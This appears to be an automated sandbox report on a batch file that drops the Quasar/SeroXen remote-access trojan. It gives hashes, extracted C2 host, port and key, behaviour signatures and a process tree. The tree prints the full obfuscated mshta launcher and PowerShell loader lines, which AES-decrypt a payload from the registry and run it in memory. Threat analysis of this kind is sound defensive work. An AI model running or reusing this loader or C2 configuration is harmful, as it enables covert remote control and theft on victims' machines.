Analysis

  • max time kernel
    300s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-06-2024 15:25

General

  • Target

    DarkMoon_Gen_1-3/lib/uni.bat

  • Size

    12.6MB

  • MD5

    8e3d8ed6db7cb979d5d56c8b847cc965

  • SHA1

    5d1ad752a988ce13da601448cdca5584610cffee

  • SHA256

    9d0b440b61b239bc3406d67bf7ae8baf1ceef65923e8558ce3a3c1a3c4a5e22a

  • SHA512

    d7a96420b1e61c4bc7db6c533704771e329239629201dbf34ac8a95a931da92c6e1d7ddb694a491656246b0eb491e96d194b7abccf54ef757c1aea92a9b96a0e

  • SSDEEP

    49152:Hq8mcjsXbvlusR48pNIN/I/EiFTPbYWLP17DFNkKuri3NSbkpXYyr7arOR150kFB:o

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.6 | SeroXen

C2

seroooooxeen.chickenkiller.com:5059

Mutex

f953c0af-702a-46b5-ad07-d900b11c5cd9

Attributes
  • encryption_key

    458790DC6E62EEB3043B4566BF95CDAF711F1EC0

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry class 37 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1008
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{3b9ba5f1-1784-4a23-9f87-331b2eec9d7f}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3460
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d1fe351b-b22b-4406-b7e4-c6139bdd4fad}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3124
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{52f07fa8-ce23-451f-9951-5c63a3227db5}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2000
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{b7d5d276-5cb9-41d7-9345-b136a30abb76}
          2⤵
            PID:4728
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{c8709f4e-5951-4529-939e-14bc82292a02}
            2⤵
              PID:4692
            • C:\Windows\System32\dllhost.exe
              C:\Windows\System32\dllhost.exe /Processid:{607de537-97e7-4ae9-a5ce-bda0a25398a4}
              2⤵
                PID:5300
              • C:\Windows\System32\dllhost.exe
                C:\Windows\System32\dllhost.exe /Processid:{80c44891-9bee-4305-953e-a1c5ed9e4779}
                2⤵
                  PID:5428
                • C:\Windows\System32\dllhost.exe
                  C:\Windows\System32\dllhost.exe /Processid:{fdd60f44-ac73-4519-bb31-1704a663231d}
                  2⤵
                    PID:3852
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -u -p 3852 -s 304
                      3⤵
                      • Checks processor information in registry
                      • Enumerates system info in registry
                      PID:4980
                  • C:\Windows\System32\dllhost.exe
                    C:\Windows\System32\dllhost.exe /Processid:{a21d9bdb-5ddf-4ca3-903c-cb0d3523cfb1}
                    2⤵
                      PID:1416
                  • C:\Windows\system32\lsass.exe
                    C:\Windows\system32\lsass.exe
                    1⤵
                      PID:676
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                      1⤵
                        PID:944
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                        1⤵
                          PID:524
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                          1⤵
                            PID:732
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            1⤵
                            • Drops file in System32 directory
                            PID:440
                            • C:\Windows\system32\taskhostw.exe
                              taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                              2⤵
                                PID:3140
                              • C:\Windows\$sxr-mshta.exe
                                C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                2⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Modifies registry class
                                • Suspicious use of WriteProcessMemory
                                PID:4124
                                • C:\Windows\$sxr-cmd.exe
                                  "C:\Windows\$sxr-cmd.exe" /c %$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:4440
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    4⤵
                                      PID:4436
                                    • C:\Windows\$sxr-powershell.exe
                                      C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))
                                      4⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      • Suspicious use of WriteProcessMemory
                                      PID:964
                                      • C:\Windows\SysWOW64\dllhost.exe
                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{2485eb32-04f5-409b-b4a0-f00d6fc75924}
                                        5⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2184
                                      • C:\Windows\$sxr-powershell.exe
                                        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(964).WaitForExit();[System.Threading.Thread]::Sleep(5000); function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4036
                                      • C:\Windows\SysWOW64\dllhost.exe
                                        C:\Windows\SysWOW64\dllhost.exe /Processid:{38818ae6-bf83-4372-b739-f8c485604c7f}
                                        5⤵
                                          PID:4768
                                        • C:\Windows\SysWOW64\dllhost.exe
                                          C:\Windows\SysWOW64\dllhost.exe /Processid:{4ecaa580-d166-4b4e-99fc-dfb7a8f90460}
                                          5⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4744
                                        • C:\Windows\SysWOW64\dllhost.exe
                                          C:\Windows\SysWOW64\dllhost.exe /Processid:{70063d23-b967-4250-adfd-bce106149a9b}
                                          5⤵
                                            PID:4144
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{bfbe7706-1a0b-4ddf-8b55-856df1463c64}
                                            5⤵
                                              PID:5500
                                            • C:\Windows\SysWOW64\dllhost.exe
                                              C:\Windows\SysWOW64\dllhost.exe /Processid:{72500d89-cbbe-4b8b-a03f-01e10bb95614}
                                              5⤵
                                                PID:736
                                              • C:\Windows\SysWOW64\dllhost.exe
                                                C:\Windows\SysWOW64\dllhost.exe /Processid:{7f810ea4-c6f8-458b-95a1-24eb38562d5c}
                                                5⤵
                                                  PID:5608
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 456
                                                    6⤵
                                                    • Drops file in Windows directory
                                                    • Program crash
                                                    • Checks processor information in registry
                                                    • Enumerates system info in registry
                                                    PID:5364
                                                • C:\Windows\SysWOW64\dllhost.exe
                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{fde0ff90-c274-4b6a-adb8-3313d6153e6d}
                                                  5⤵
                                                    PID:4308
